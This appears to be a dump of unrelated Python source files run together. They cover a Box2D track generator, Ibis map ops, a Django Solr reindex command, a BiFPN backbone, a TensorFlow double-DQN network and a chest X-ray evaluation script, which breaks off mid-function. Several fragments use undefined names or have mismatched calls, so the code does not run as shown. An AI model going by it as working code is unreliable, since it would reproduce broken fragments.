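# p' = R(rads) @ (p - center) + center, expanded componentwise below.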
new_coords: List[b2Vec2] = []
for coord in coords:
new_coord = b2Vec2()
new_coord.x = math.cos(rads)*(coord.x - center.x) - math.sin(rads)*(coord.y - center.y) + center.x
new_coord.y = math.sin(rads)*(coord.x - center.x) + math.cos(rads)*(coord.y - center.y) + center.y
new_coords.append(new_coord)
return new_coords
def create_floor_tile(world: b2World, position: b2Vec2, angle: float) -> b2Body:
"""
Create a floor tile at some angle
"""
width = get_boxcar_constant('floor_tile_width')
height = get_boxcar_constant('floor_tile_height')
body_def = b2BodyDef()
body_def.position = position
body = world.CreateBody(body_def)
# Create Fixture
fixture_def = b2FixtureDef()
fixture_def.shape = b2PolygonShape()
fixture_def.friction = 0.5
# Coordinates of tile
# p3---------p2
# | |
# p0---------p1
coords: List[b2Vec2] = []
coords.append(b2Vec2(0, 0)) # p0
coords.append(b2Vec2(width, 0)) # p1
coords.append(b2Vec2(width, -height)) # p2
coords.append(b2Vec2(0, -height)) # p3
# Rotate @NOTE: This rotates in reference to p0
coords = rotate_floor_tile(coords, b2Vec2(0, 0), angle)
# Set vertices of fixture
fixture_def.shape.vertices = coords
body.CreateFixture(fixture_def)
return body
class Floor(object):
def __init__(self, world: b2World, seed = get_boxcar_constant('gaussian_floor_seed'), num_tiles = get_boxcar_constant('max_floor_tiles')):
self.world = world
self.seed = seed # @TODO: Add this to the setting
self.num_tiles = num_tiles
self.floor_tiles: List[b2Body] = []
self.rand = np.random.RandomState(self.seed)  # @NOTE: the floor has its own random state that it references.
self.floor_creation_type = get_boxcar_constant('floor_creation_type').lower()
if self.floor_creation_type == 'gaussian':
self._generate_gaussian_random_floor()
elif self.floor_creation_type == 'ramp':
self._generate_ramp()
elif self.floor_creation_type == 'jagged':
self._create_jagged_floor()
self.lowest_y = 10
for floor_tile in self.floor_tiles:
world_coords = [floor_tile.GetWorldPoint(floor_tile.fixtures[0].shape.vertices[i]) for i in range(4)]
for coord in world_coords:
if coord.y < self.lowest_y:
self.lowest_y = coord.y
def destroy(self):
"""
Destroy the floor.
If you're familiar with C, think of this as "free"
"""
for tile in self.floor_tiles:
self.world.DestroyBody(tile)
def _generate_gaussian_random_floor(self):
"""
Helper method for generating a gaussian random floor
"""
threshold = get_boxcar_constant('tile_gaussian_threshold')
denominator = get_boxcar_constant('tile_gaussian_denominator')
mu = get_boxcar_constant('tile_angle_mu')
std = get_boxcar_constant('tile_angle_std')
tile_position = b2Vec2(-5, 0)
#@NOTE: Look in README.md for explanation of the below equation
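# In short: angle_i = N(mu, std) * min(min(i, threshold) / denominator, 1.0) -- the scale grows
# linearly with the tile index (capped at threshold / denominator) and saturates at 1.0,
# so the first tiles stay nearly flat.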
for i in range(self.num_tiles):
numerator = min(i, threshold)
scale = min(float(numerator) / denominator, 1.0)
angle = self.rand.normal(mu, std) * scale
floor_tile = create_floor_tile(self.world, tile_position, angle)
self.floor_tiles.append(floor_tile)
t = 1
if angle < 0:
t = 0
# @TODO: Fix this. For whatever reason B2D rearranges the vertices. I should track a point during its creation instead
world_coord = floor_tile.GetWorldPoint(floor_tile.fixtures[0].shape.vertices[t])
tile_position = world_coord
self._create_stopping_zone(tile_position)
def _generate_ramp(self):
"""
Helper method for generating a ramp
"""
const_angle = get_boxcar_constant('ramp_constant_angle')
approach_tiles_needed = get_boxcar_constant('ramp_approach_distance') / get_boxcar_constant('floor_tile_width')
approach_tiles_needed = math.ceil(approach_tiles_needed)
# Create the approach
tile_position = b2Vec2(-5, 0)
for i in range(approach_tiles_needed):
floor_tile = create_floor_tile(self.world, tile_position, 0)
self.floor_tiles.append(floor_tile)
world_coord = floor_tile.GetWorldPoint(floor_tile.fixtures[0].shape.vertices[1])
tile_position = world_coord
last_approach_tile = tile_position
# Are we using a constant angle for the ramp?
if const_angle:
num_ramp_tiles = get_boxcar_constant('ramp_constant_distance') / get_boxcar_constant('floor_tile_width')
num_ramp_tiles = math.ceil(num_ramp_tiles)
# Create ramp
for i in range(num_ramp_tiles):
floor_tile = create_floor_tile(self.world, tile_position, const_angle)
self.floor_tiles.append(floor_tile)
world_coord = floor_tile.GetWorldPoint(floor_tile.fixtures[0].shape.vertices[1])
tile_position = world_coord
# If not, create the increasing ramp
else:
start_angle = get_boxcar_constant('ramp_start_angle')
increasing_angle = get_boxcar_constant('ramp_increasing_angle')
max_angle = get_boxcar_constant('ramp_max_angle')
increasing_type = get_boxcar_constant('ramp_increasing_type').lower()
current_angle = start_angle
# Create ramp
while True:
if increasing_type == 'multiply':
next_angle = current_angle * increasing_angle
elif increasing_type == 'add':
next_angle = current_angle + increasing_angle
else:
raise Exception("Unknown 'ramp_increasing_type', '{}'".format(increasing_type))
# If the next requested angle exceeds our maximum, break
if next_angle > max_angle:
break
floor_tile = create_floor_tile(self.world, tile_position, current_angle)
self.floor_tiles.append(floor_tile)
world_coord = floor_tile.GetWorldPoint(floor_tile.fixtures[0].shape.vertices[1])
tile_position = world_coord
current_angle = next_angle
# Create the landing zone
distance_to_fly = get_boxcar_constant('ramp_distance_needed_to_jump')
tile_position = b2Vec2(tile_position.x + distance_to_fly, last_approach_tile.y)
for i in range(10):
floor_tile = create_floor_tile(self.world, tile_position, 0)
self.floor_tiles.append(floor_tile)
world_coord = floor_tile.GetWorldPoint(floor_tile.fixtures[0].shape.vertices[1])
tile_position = world_coord
self._create_stopping_zone(tile_position)
def _create_jagged_floor(self):
"""
Helper method for creating a jagged floor.
"""
tile_position = b2Vec2(-5, 0)
increasing_angle = get_boxcar_constant('jagged_increasing_angle')
decreasing_angle = -get_boxcar_constant('jagged_decreasing_angle')
for i in range(get_boxcar_constant('max_floor_tiles')):
angle = increasing_angle if i % 2 == 1 else decreasing_angle
floor_tile = create_floor_tile(self.world, tile_position, angle)
self.floor_tiles.append(floor_tile)
# You can blame this part of B2D. For Python it rearranges the vertices that I reference...
t = 1
if angle < 0:
                t = 0
world_coord = floor_tile.GetWorldPoint(floor_tile.fixtures[0].shape.vertices[t])
tile_position = world_coord
self._create_stopping_zone(tile_position)
def _create_stopping_zone(self, tile_position: b2Vec2) -> None:
"""
Creates a stopping zone so that the cars have a flat surface at the end of whatever track they were on.
"""
max_car_size = (get_boxcar_constant('max_chassis_axis') * 2.0) + (2.0 * get_boxcar_constant('max_wheel_radius'))
tile_width = get_boxcar_constant('floor_tile_width')
tiles_needed_before_wall = math.ceil(max_car_size / tile_width)
additional_landing_zone = 0.0
additional_tiles_needed = additional_landing_zone / tile_width
total_tiles_needed = math.ceil(tiles_needed_before_wall + additional_tiles_needed + 1)
# Create a landing zone
for i in range(total_tiles_needed):
floor_tile = create_floor_tile(self.world, tile_position, 0)
self.floor_tiles.append(floor_tile)
world_coord = floor_tile.GetWorldPoint(floor_tile.fixtures[0].shape.vertices[1])
tile_position = world_coord
if i == tiles_needed_before_wall:
self.winning_tile = self.floor_tiles[-1]
# @NOTE: If you really want you can add the below back in. I'm not adding it to settings, but it is funny
# to watch the cars develop strategies to try to climb the wall.
# Create wall
# num_wall_tiles = math.ceil(max_car_size * 2.0 / tile_width)
# for i in range(num_wall_tiles):
# floor_tile = create_floor_tile(self.world, tile_position, 90)
# self.floor_tiles.append(floor_tile)
# world_coord = floor_tile.GetWorldPoint(floor_tile.fixtures[0].shape.vertices[1])
# # Adjust the tile to the left a bit so they overlap and form a wall
# tile_position = b2Vec2(world_coord.x - get_boxcar_constant('floor_tile_height'), world_coord.y)
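# --- Illustrative sketch (not part of the original module) ---
# A standalone check of the stopping-zone sizing logic above, using made-up
# constant values in place of get_boxcar_constant(). It only shows how the
# flat-tile count scales with car size and tile width.
def _stopping_zone_tile_count(max_chassis_axis=1.1, max_wheel_radius=0.5, floor_tile_width=1.5):
    max_car_size = (max_chassis_axis * 2.0) + (2.0 * max_wheel_radius)
    tiles_needed_before_wall = math.ceil(max_car_size / floor_tile_width)
    # no additional landing zone, mirroring additional_landing_zone = 0.0 above
    return math.ceil(tiles_needed_before_wall + 1)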
|
500934
|
from public import public
from ...common import exceptions as com
from .. import datatypes as dt
from .. import rules as rlz
from ..signature import Argument as Arg
from .core import ValueOp
@public
class MapLength(ValueOp):
arg = Arg(rlz.mapping)
output_type = rlz.shape_like('arg', dt.int64)
@public
class MapValueForKey(ValueOp):
arg = Arg(rlz.mapping)
key = Arg(rlz.one_of([rlz.string, rlz.integer]))
def output_type(self):
return rlz.shape_like(tuple(self.args), self.arg.type().value_type)
@public
class MapValueOrDefaultForKey(ValueOp):
arg = Arg(rlz.mapping)
key = Arg(rlz.one_of([rlz.string, rlz.integer]))
default = Arg(rlz.any)
def output_type(self):
arg = self.arg
default = self.default
map_type = arg.type()
value_type = map_type.value_type
default_type = default.type()
if default is not None and not dt.same_kind(default_type, value_type):
raise com.IbisTypeError(
"Default value\n{}\nof type {} cannot be cast to map's value "
"type {}".format(default, default_type, value_type)
)
result_type = dt.highest_precedence((default_type, value_type))
return rlz.shape_like(tuple(self.args), result_type)
@public
class MapKeys(ValueOp):
arg = Arg(rlz.mapping)
def output_type(self):
arg = self.arg
return rlz.shape_like(arg, dt.Array(arg.type().key_type))
@public
class MapValues(ValueOp):
arg = Arg(rlz.mapping)
def output_type(self):
arg = self.arg
return rlz.shape_like(arg, dt.Array(arg.type().value_type))
@public
class MapConcat(ValueOp):
left = Arg(rlz.mapping)
right = Arg(rlz.mapping)
output_type = rlz.typeof('left')
|
500956
|
from time import time
from django.core.management.base import BaseCommand, CommandError
from django.db.models import Q
from canvas.models import Comment, Category
from canvas import search
from django.conf import settings
class Command(BaseCommand):
args = 'solr_core'
help = 'WARNING: Deletes everything first! Bulk import all data into SOLR. solr_core is one of "comment" or "group"'
def handle(self, solr_core, *args, **options):
if solr_core == 'comment':
qs = Comment.objects.exclude(reply_content__id=None).filter(category__name='stamps')
elif solr_core == 'group':
qs = Category.objects.all()
else:
raise Exception("Unknown solr_core %r" % solr_core)
conn = search.get_local(solr_core).connection
conn.delete_query('*:*')
count = qs.count()
for e, obj in enumerate(qs.only('id')):
obj.update_solr()
if e % 100 == 0:
print "%0.02f%% complete" % (float(e)/count*100)
print "Commit/Optimize"
conn.commit()
conn.optimize()
print "Done!"
|
500957
|
import timm
import torch
import torch.nn.functional as F
from detectron2.layers import NaiveSyncBatchNorm, ShapeSpec
from detectron2.modeling import Backbone
from torch import nn
__all__ = ["BiFPN"]
class DepthwiseSeparableConv2d(nn.Sequential):
def __init__(
self,
in_channels,
out_channels,
kernel_size,
stride=1,
padding=0,
dilation=1,
bias=True,
):
        depthwise_conv = nn.Conv2d(
in_channels,
out_channels,
kernel_size,
stride=stride,
padding=padding,
dilation=dilation,
groups=in_channels,
bias=False,
)
pointwise_conv = nn.Conv2d(
out_channels,
out_channels,
kernel_size=1,
bias=bias,
)
        super().__init__(depthwise_conv, pointwise_conv)
class Conv3x3BnReLU(nn.Sequential):
def __init__(self, in_channels, stride=1):
conv = DepthwiseSeparableConv2d(
in_channels,
in_channels,
kernel_size=3,
bias=False,
padding=1,
stride=stride,
)
bn = NaiveSyncBatchNorm(in_channels, momentum=0.03)
relu = nn.ReLU(inplace=True)
super().__init__(conv, bn, relu)
class FastNormalizedFusion(nn.Module):
def __init__(self, in_nodes):
super().__init__()
self.in_nodes = in_nodes
self.weight = nn.Parameter(torch.ones(in_nodes, dtype=torch.float32))
self.register_buffer("eps", torch.tensor(0.0001))
def forward(self, *x):
if len(x) != self.in_nodes:
raise RuntimeError(
"Expected to have {} input nodes, but have {}.".format(self.in_nodes, len(x))
)
# where wi ≥ 0 is ensured by applying a relu after each wi (paper)
weight = F.relu(self.weight)
weighted_xs = [xi * wi for xi, wi in zip(x, weight)]
normalized_weighted_x = sum(weighted_xs) / (weight.sum() + self.eps)
return normalized_weighted_x
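# --- Illustrative sketch (not part of the original module) ---
# Manual check of the fast normalized fusion above: with the default weights
# of 1.0, fusing two identical feature maps returns (almost) the same map,
# since (1*x + 1*x) / (1 + 1 + eps) ~= x.
def _fast_fusion_demo():
    fuse = FastNormalizedFusion(in_nodes=2)
    x = torch.ones(1, 8, 4, 4)
    fused = fuse(x, x)
    assert torch.allclose(fused, x, atol=1e-3)
    return fused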
class BiFPN(Backbone):
"""
This module implements Feature Pyramid Network.
It creates pyramid features built on top of some input feature maps.
"""
def __init__(self, bottom_up, out_channels, top_block=None):
super().__init__()
self.bottom_up = bottom_up
self.top_block = top_block
self.l5 = nn.Conv2d(bottom_up.feature_info[4]['num_chs'], out_channels, kernel_size=1)
self.l4 = nn.Conv2d(bottom_up.feature_info[3]['num_chs'], out_channels, kernel_size=1)
self.l3 = nn.Conv2d(bottom_up.feature_info[2]['num_chs'], out_channels, kernel_size=1)
self.l2 = nn.Conv2d(bottom_up.feature_info[1]['num_chs'], out_channels, kernel_size=1)
self.p4_tr = Conv3x3BnReLU(out_channels)
self.p3_tr = Conv3x3BnReLU(out_channels)
self.up = nn.Upsample(scale_factor=2, mode="nearest")
self.fuse_p4_tr = FastNormalizedFusion(in_nodes=2)
self.fuse_p3_tr = FastNormalizedFusion(in_nodes=2)
self.down_p2 = Conv3x3BnReLU(out_channels, stride=2)
self.down_p3 = Conv3x3BnReLU(out_channels, stride=2)
self.down_p4 = Conv3x3BnReLU(out_channels, stride=2)
self.fuse_p5_out = FastNormalizedFusion(in_nodes=2)
self.fuse_p4_out = FastNormalizedFusion(in_nodes=3)
self.fuse_p3_out = FastNormalizedFusion(in_nodes=3)
self.fuse_p2_out = FastNormalizedFusion(in_nodes=2)
self.p5_out = Conv3x3BnReLU(out_channels)
self.p4_out = Conv3x3BnReLU(out_channels)
self.p3_out = Conv3x3BnReLU(out_channels)
self.p2_out = Conv3x3BnReLU(out_channels)
self._out_features = ["p2", "p3", "p4", "p5", "p6"]
self._out_feature_channels = {k: out_channels for k in self._out_features}
self._size_divisibility = 32
self._out_feature_strides = {}
for k, name in enumerate(self._out_features):
self._out_feature_strides[name] = 2 ** (k + 2)
@property
def size_divisibility(self):
return self._size_divisibility
def forward(self, x):
p5, p4, p3, p2 = self.bottom_up(x) # top->down
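        # (presumably) ties every backbone parameter into the autograd graph, e.g. so
        # distributed training does not complain about unused parameters; adds exactly zero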
_dummy = sum(x.view(-1)[0] for x in self.bottom_up.parameters()) * 0.0
p5 = p5 + _dummy
p5 = self.l5(p5)
p4 = self.l4(p4)
p3 = self.l3(p3)
p2 = self.l2(p2)
p4_tr = self.p4_tr(self.fuse_p4_tr(p4, self.up(p5)))
p3_tr = self.p3_tr(self.fuse_p3_tr(p3, self.up(p4_tr)))
p2_out = self.p2_out(self.fuse_p2_out(p2, self.up(p3_tr)))
p3_out = self.p3_out(self.fuse_p3_out(p3, p3_tr, self.down_p2(p2_out)))
p4_out = self.p4_out(self.fuse_p4_out(p4, p4_tr, self.down_p3(p3_out)))
p5_out = self.p5_out(self.fuse_p5_out(p5, self.down_p4(p4_out)))
return {"p2": p2_out, "p3": p3_out, "p4": p4_out, "p5": p5_out, "p6": self.top_block(p5_out)[0]}
def output_shape(self):
return {
name: ShapeSpec(
channels=self._out_feature_channels[name], stride=self._out_feature_strides[name]
)
for name in self._out_features
}
def test_script():
m = timm.create_model('spnasnet_100', pretrained=True, features_only=True, out_indices=(1, 2, 3, 4), )
x = torch.rand(1, 3, 224, 224)
m2 = BiFPN(m, 112)
torch.jit.trace(BiFPN(m, 10, 20), x)
if __name__ == "__main__":
m = timm.create_model('spnasnet_100', pretrained=True, features_only=True, out_indices=(1, 2, 3, 4), )
x = torch.rand(1, 3, 224, 224)
m2 = BiFPN(m, 112)
# for f in m2(x):
# print(f.size())
# torch.jit.trace(BiFPN(m, 10, 20), x)
# assert isinstance(m, Backbone)
|
500991
|
import re
from django.core.exceptions import ValidationError
def safe_character_validator(value):
unsafe_chars = re.compile(r'.*[<>\/\\;:&].*')
message = 'Enter only safe characters.'
if unsafe_chars.match(value):
raise ValidationError(message)
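# --- Illustrative usage sketch (assumed, not part of the original module) ---
# The validator rejects any value containing one of the characters <>/\;:&.
# Plain text passes; markup-like input raises ValidationError.
def _demo_safe_character_validator():
    safe_character_validator('hello world')  # no exception
    try:
        safe_character_validator('<script>alert(1)</script>')
    except ValidationError:
        return True
    return False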
|
500994
|
from .metrics import *
from .classifier_metric import accuracy
from .sr_metric import *
from .segmentation_metric import *
|
501023
|
try:
from setuptools import setup
except:
from distutils.core import setup
setup(
name='t',
version='1.2.0',
author='<NAME>',
author_email='<EMAIL>',
url='https://hg.stevelosh.com/t',
py_modules=['t'],
entry_points={
'console_scripts': [
't = t:_main',
],
},
)
|
501035
|
import enum
from typing import Iterable, Optional
from lms.lmsdb.models import Notification, User
class NotificationKind(enum.Enum):
CHECKED = 1
FLAKE8_ERROR = 2
UNITTEST_ERROR = 3
USER_RESPONSE = 4
def get(user: User) -> Iterable[Notification]:
return Notification.fetch(user)
def read(user: Optional[User] = None, id_: Optional[int] = None) -> bool:
if id_:
try:
notification = Notification.get_by_id(id_)
except Notification.DoesNotExist:
return False
if user and (user.id != notification.user.id):
return False
notification.read()
return True
assert user, 'Must provide user or id_' # noqa: B101, S101
is_success = [msg.read() for msg in get(user)]
return all(is_success) # Not gen to prevent lazy evaluation
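# --- Illustrative sketch (assumed, not part of the original module) ---
# Why a list comprehension rather than a generator above: all() short-circuits
# on the first falsy value, so with a generator some notifications would never
# have read() called on them.
def _read_all_demo():
    calls = []
    def fake_read(ok):
        calls.append(ok)
        return ok
    all(fake_read(ok) for ok in [True, False, True])    # generator: stops early
    assert calls == [True, False]
    calls.clear()
    all([fake_read(ok) for ok in [True, False, True]])  # list: every read() runs
    assert calls == [True, False, True]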
def read_related(related_id: int, user: int):
for n in Notification.of(related_id, user):
n.read()
def send(
user: User,
kind: NotificationKind,
message: str,
related_id: Optional[int] = None,
action_url: Optional[str] = None,
) -> Notification:
return Notification.send(
user, kind.value, message, related_id, action_url,
)
|
501041
|
import tensorflow as tf
import numpy as np
from . import base_model
class Qnetwork(base_model.BaseModel):
"""
Args:
name (string): label for model namespace
path (string): path to save/load model
input_shape (tuple): tuple of inputs to network.
output_shape (int): number of output nodes for network.
filter_sizes (tuple of ints): number of filters in each of the two hidden layers. Defaults to (512,512).
learning_rate (float): network's willingness to change current weights given new example
regularization (float): strength of weights regularization term in loss function
discount_factor (float): factor by which future reward after next action is taken are discounted
tau (float): Hyperparameter used in updating target network (if used)
Some notable values:
tau = 1.e-3 -> used in original paper
tau = 0.5 -> average DDQN
tau = 1.0 -> copy online -> target
    A Q-network class which is responsible for holding and updating the weights and biases used in predicting Q-values for a given state. This Q-network will consist of
the following layers:
1) Input- a DraftState state s (an array of bool) representing the current state reshaped into an [n_batch, *input_shape] tensor.
2) Two layers of relu-activated hidden fc layers with dropout
3) Output- linearly activated estimations for Q-values Q(s,a) for each of the output_shape actions a available.
"""
@property
def name(self):
return self._name
@property
def discount_factor(self):
return self._discount_factor
def __init__(self, name, path, input_shape, output_shape, filter_sizes=(512,512), learning_rate=1.e-5, regularization_coeff=1.e-4, discount_factor=0.9, tau=1.0):
super().__init__(name=name, path=path)
self._input_shape = input_shape
self._output_shape = output_shape
self._filter_sizes = filter_sizes
self._learning_rate = learning_rate
self._regularization_coeff = regularization_coeff
self._discount_factor = discount_factor
self._n_hidden_layers = len(filter_sizes)
self._n_layers = self._n_hidden_layers + 2
self._tau = tau
self.online_name = "online"
self.target_name = "target"
# Build base Q-network model
self.online_ops = self.build_model(name = self.online_name)
# If using a target network for DDQN network, add related ops to model
if(self.target_name):
self.target_ops = self.build_model(name = self.target_name)
self.target_ops["target_init"] = self.create_target_initialization_ops(self.target_name, self.online_name)
self.target_ops["target_update"] = self.create_target_update_ops(self.target_name, self.online_name, tau=self._tau)
with self._graph.as_default():
self.online_ops["init"] = tf.global_variables_initializer()
self.init_saver()
def init_saver(self):
with self._graph.as_default():
self.saver = tf.train.Saver()
def save(self, path):
self.saver.save(self.sess, save_path=path)
def load(self, path):
self.saver.restore(self.sess, save_path=path)
def build_model(self, name):
ops_dict = {}
with self._graph.as_default():
with tf.variable_scope(name):
ops_dict["learning_rate"] = tf.Variable(self._learning_rate, trainable=False, name="learning_rate")
# Incoming state matrices are of size input_size = (nChampions, nPos+2)
# 'None' here means the input tensor will flex with the number of training
# examples (aka batch size).
ops_dict["input"] = tf.placeholder(tf.float32, (None,)+self._input_shape, name="inputs")
ops_dict["dropout_keep_prob"] = tf.placeholder_with_default(1.0,shape=())
# Fully connected (FC) layers:
fc0 = tf.layers.dense(
ops_dict["input"],
self._filter_sizes[0],
activation=tf.nn.relu,
bias_initializer=tf.constant_initializer(0.1),
name="fc_0")
dropout0 = tf.nn.dropout(fc0, ops_dict["dropout_keep_prob"])
fc1 = tf.layers.dense(
dropout0,
self._filter_sizes[1],
activation=tf.nn.relu,
bias_initializer=tf.constant_initializer(0.1),
name="fc_1")
dropout1 = tf.nn.dropout(fc1, ops_dict["dropout_keep_prob"])
# FC output layer
ops_dict["outQ"] = tf.layers.dense(
dropout1,
self._output_shape,
activation=None,
bias_initializer=tf.constant_initializer(0.1),
kernel_regularizer=tf.contrib.layers.l2_regularizer(scale=self._regularization_coeff),
name="q_vals")
# Placeholder for valid actions filter
ops_dict["valid_actions"] = tf.placeholder(tf.bool, shape=ops_dict["outQ"].shape, name="valid_actions")
# Filtered Q-values
ops_dict["valid_outQ"] = tf.where(ops_dict["valid_actions"], ops_dict["outQ"], tf.scalar_mul(-np.inf,tf.ones_like(ops_dict["outQ"])), name="valid_q_vals")
# Max Q value amongst valid actions
ops_dict["max_Q"] = tf.reduce_max(ops_dict["valid_outQ"], axis=1, name="max_Q")
# Predicted optimal action amongst valid actions
ops_dict["prediction"] = tf.argmax(ops_dict["valid_outQ"], axis=1, name="prediction")
# Loss function and optimization:
# The inputs self.target and self.actions are indexed by training example. If
# s[i] = starting state for ith training example (recall that input state s is described by a vector so this will be a matrix)
# a*[i] = action taken from state s[i] during this training sample
# Q*(s[i],a*[i]) = the actual value observed from taking action a*[i] from state s[i]
# outQ[i,-] = estimated values for all actions from state s[i]
# Then we can write the inputs as
# self.target[i] = Q*(s[i],a*[i])
# self.actions[i] = a*[i]
ops_dict["target"] = tf.placeholder(tf.float32, shape=[None], name="target_Q")
ops_dict["actions"] = tf.placeholder(tf.int32, shape=[None], name="submitted_action")
# Since the Qnet outputs a vector Q(s,-) of predicted values for every possible action that can be taken from state s,
# we need to connect each target value with the appropriate predicted Q(s,a*) = Qout[i,a*[i]].
# Main idea is to get indexes into the outQ tensor based on input actions and gather the resulting Q values
# For some reason this isn't easy for tensorflow to do. So we must manually form the list of
# [i, actions[i]] index pairs for outQ..
# n_batch = outQ.shape[0] = actions.shape[0]
# n_actions = outQ.shape[1]
ind = tf.stack([tf.range(tf.shape(ops_dict["actions"])[0]),ops_dict["actions"]],axis=1)
# and then "gather" them.
estimatedQ = tf.gather_nd(ops_dict["outQ"], ind)
# Special notes: this is more efficient than indexing into the flattened version of outQ (which I have seen before)
# because the gather operation is applied to outQ directly. Apparently this propagates the gradient more efficiently
# under specific sparsity conditions (which tf.Variables like outQ satisfy)
# Simple sum-of-squares loss (error) function. Note that biases do not
# need to be regularized since they are (generally) not subject to overfitting.
ops_dict["loss"] = tf.reduce_mean(0.5*tf.square(ops_dict["target"]-estimatedQ), name="loss")
ops_dict["trainer"] = tf.train.AdamOptimizer(learning_rate = ops_dict["learning_rate"])
ops_dict["update"] = ops_dict["trainer"].minimize(ops_dict["loss"], name="update")
return ops_dict
def create_target_update_ops(self, target_scope, online_scope, tau=1e-3, name="target_update"):
"""
        Adds operations to the graph which are used to update the target network after a training batch is sent
through the online network.
This function should be executed only once before training begins. The resulting operations should
be run within a tf.Session() once per training batch.
        In double-Q network learning, the online (primary) network is updated using traditional backpropagation techniques
with target values produced by the target-Q network.
To improve stability, the target-Q is updated using a linear combination of its current weights
with the current weights of the online network:
Q_target = tau*Q_online + (1-tau)*Q_target
Typical tau values are small (tau ~ 1e-3). For more, see https://arxiv.org/abs/1509.06461 and https://arxiv.org/pdf/1509.02971.pdf.
Args:
target_scope (str): name of scope that target network occupies
online_scope (str): name of scope that online network occupies
tau (float32): Hyperparameter for combining target-Q and online-Q networks
name (str): name of operation which updates the target network when run within a session
        Returns: Tensorflow operation which updates the target network when run.
"""
with self._graph.as_default():
target_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=target_scope)
online_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=online_scope)
ops = [target_params[i].assign(tf.add(tf.multiply(tau,online_params[i]),tf.multiply(1.-tau,target_params[i]))) for i in range(len(target_params))]
return tf.group(*ops,name=name)
def create_target_initialization_ops(self, target_scope, online_scope):
"""
This adds operations to the graph in order to initialize the target Q network to the same values as the
online network.
This function should be executed only once just after the online network has been initialized.
Args:
target_scope (str): name of scope that target network occupies
online_scope (str): name of scope that online network occupies
Returns:
            Tensorflow operation (named "target_init") which initializes the target network when run.
"""
return self.create_target_update_ops(target_scope, online_scope, tau=1.0, name="target_init")
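# --- Illustrative sketch (not part of the original module) ---
# Numeric check of the soft-update rule described above, Q_target = tau*Q_online
# + (1 - tau)*Q_target, with tau = 1.0 reducing to a plain copy (as used for
# target initialization).
def _soft_update_demo():
    online = np.array([1.0, 2.0, 3.0])
    target = np.array([0.0, 0.0, 0.0])
    tau = 1e-3
    soft = tau * online + (1.0 - tau) * target
    copy = 1.0 * online + (1.0 - 1.0) * target
    return soft, copy  # soft ~= [0.001, 0.002, 0.003], copy == online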
|
501042
|
INITIAL_RPC_IF_ID = RPC_IF_ID
class _RPC_IF_ID(INITIAL_RPC_IF_ID):
def __repr__(self):
return '<RPC_IF_ID "{0}" ({1}, {2})>'.format(self.Uuid.to_string(), self.VersMajor, self.VersMinor)
|
501072
|
import torch
from model import resnet34
from PIL import Image
import matplotlib.pyplot as plt
import json
import os
import torch.utils.data as data
import numpy as np
import pandas as pd
import cv2
import logging
from torchvision import transforms, datasets
from torch.utils.data import DataLoader, RandomSampler, DistributedSampler, SequentialSampler
import argparse
from datetime import timedelta
from tqdm import tqdm
logger = logging.getLogger(__name__)
def simple_accuracy(preds, labels):
# print(preds)
# print(labels)
return (preds == labels).mean()
def load_weights(model, weight_path):
pretrained_weights = torch.load(weight_path)
model_weights = model.state_dict()
load_weights = {k: v for k, v in pretrained_weights.items() if k in model_weights}
model_weights.update(load_weights)
model.load_state_dict(model_weights)
return model
def setup(args):
# Prepare model
config = CONFIGS[args.model_type]
# num_classes = if args.dataset == "cifar10" else 100
num_classes = args.num_classes
model = VisionTransformer(config, args.img_size, zero_head=True, num_classes=num_classes)
# model.load_from(np.load(args.pretrained_dir))
model = load_weights(model, args.pretrained_dir)
model.to(args.device)
num_params = count_parameters(model)
logger.info("{}".format(config))
logger.info("Training parameters %s", args)
logger.info("Total Parameter: \t%2.1fM" % num_params)
print(num_params)
return args, model
def count_parameters(model):
params = sum(p.numel() for p in model.parameters() if p.requires_grad)
return params/1000000
class XRAY(data.Dataset):
train_data = "train_data.txt"
val_data = "val_data.txt"
test_data = "test_data.txt"
train_label = "train_label.npy"
val_label = "val_label.npy"
test_label = "test_label.npy"
def __init__(self, root, split="train", transform=None):
        super(XRAY, self).__init__()
self.split = split
self.root = root
self.transform = transform
        self.data = []  # holds the image file paths
        # self.targets = []  # holds the image labels
        if self.split == "train":
            # files for the training split
downloaded_data_txt = self.train_data
downloaded_label_txt= self.train_label
elif self.split == "val":
downloaded_data_txt = self.val_data
downloaded_label_txt= self.val_label
elif self.split == "test":
downloaded_data_txt = self.test_data
downloaded_label_txt= self.test_label
with open(os.path.join(self.root,downloaded_data_txt),"r",encoding="utf-8") as fr:
data_list = fr.readlines()
for i in range(len(data_list)):
if data_list[i][-1] == '\n':
self.data.append(data_list[i][:-1])
else :
self.data.append(data_list[i])
self.targets = np.load(os.path.join(root,downloaded_label_txt))
def __len__(self) -> int:
return len(self.data)
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is index of the target class.
"""
img_path, target = self.data[index], self.targets[index]
# doing this so that it is consistent with all other datasets
# to return a PIL Image
img = Image.open(img_path).convert("RGB")
if self.transform is not None:
img = self.transform(img)
return img, target
def get_test_loader():
transform_test = transforms.Compose([
transforms.Resize((224, 224)),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
])
    # only the validation split is needed for evaluation
    testset = XRAY(root = "./DataProcessed/VinBigData_Chest_X-ray/", split="val", transform= transform_test)
test_sampler = SequentialSampler(testset)
test_loader = DataLoader(testset,
sampler=test_sampler,
batch_size=64,
num_workers=4,
pin_memory=True) if testset is not None else None
return test_loader
def valid(args, model, test_loader):
# Validation!
eval_losses = AverageMeter()
logger.info("***** Running Validation *****")
logger.info(" Num steps = %d", len(test_loader))
logger.info(" Batch size = %d", args.eval_batch_size)
model.eval()
all_preds, all_label = [], []
epoch_iterator = tqdm(test_loader,
desc="Validating... (loss=X.X)",
bar_format="{l_bar}{r_bar}",
dynamic_ncols=True,
disable=args.local_rank not in [-1, 0])
# loss_fct = torch.nn.CrossEntropyLoss()
loss_fct = torch.nn.BCEWithLogitsLoss()
sigmoid = torch.nn.Sigmoid()
for step, batch in enumerate(epoch_iterator):
# if step > 10: # debug code
# break
batch = tuple(t.to(args.device) for t in batch)
x, y = batch
with torch.no_grad():
logits = model(x)[0]
eval_loss = loss_fct(logits, y.float())
eval_losses.update(eval_loss.item())
# preds = torch.argmax(logits, dim=-1)
preds = (logits.sigmoid() > 0.5) * 1
if len(all_preds) == 0:
all_preds.append(preds.detach().cpu().numpy())
all_label.append(y.detach().cpu().numpy())
else:
all_preds[0] = np.append(
all_preds[0], preds.detach().cpu().numpy(), axis=0
)
all_label[0] = np.append(
